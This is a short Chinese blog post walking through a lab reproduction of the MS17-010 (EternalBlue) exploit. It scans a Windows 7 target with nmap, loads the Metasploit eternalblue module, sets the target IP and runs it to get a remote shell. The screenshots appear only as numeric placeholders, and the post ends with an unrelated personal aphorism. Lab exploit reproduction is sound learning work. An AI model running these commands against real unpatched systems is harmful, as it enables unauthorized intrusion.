MS17-010漏洞利用复现

MS17-010漏洞利用复现

准备环境:
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50

首先我们需要查看一下靶机是否开启445端口

打开kali终端,输入nmap 172.16.15.118 对靶机进行端口扫描

1573699360821

可以看到445端口是开着的

接下来我们输入msfconsole命令进入Metasploit 工具加载攻击模块

进入工具后输入search ms17-010命令 查看可用攻击模块

1573699588038

Check 参数为Yes的模块都是我们可用使用的

加载攻击模块:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

进入该模块后我们可用使用show options 来查看我们需要设置哪些参数

1573699759582

Required 参数为Yes的都是我们需要设置具体值的

由于RPORT默认是445端口所以我们不进行任何设置

设置目标ip:set rhosts 172.16.15.118

进行攻击:run命令或者exploit

1573699963378

等了一会儿之后发现我们已经成功获取到目标靶机的shell了

1573700012638

今天的复现结果挺成功

最后让我矫情一下:

没有原则的妥协 会让人以为你没主见 没底线的原谅 会让人以为你是非不分 别人待你如何 往往都是你自己调教出来的结果

原文地址:https://www.cnblogs.com/yanlzy/p/11855627.html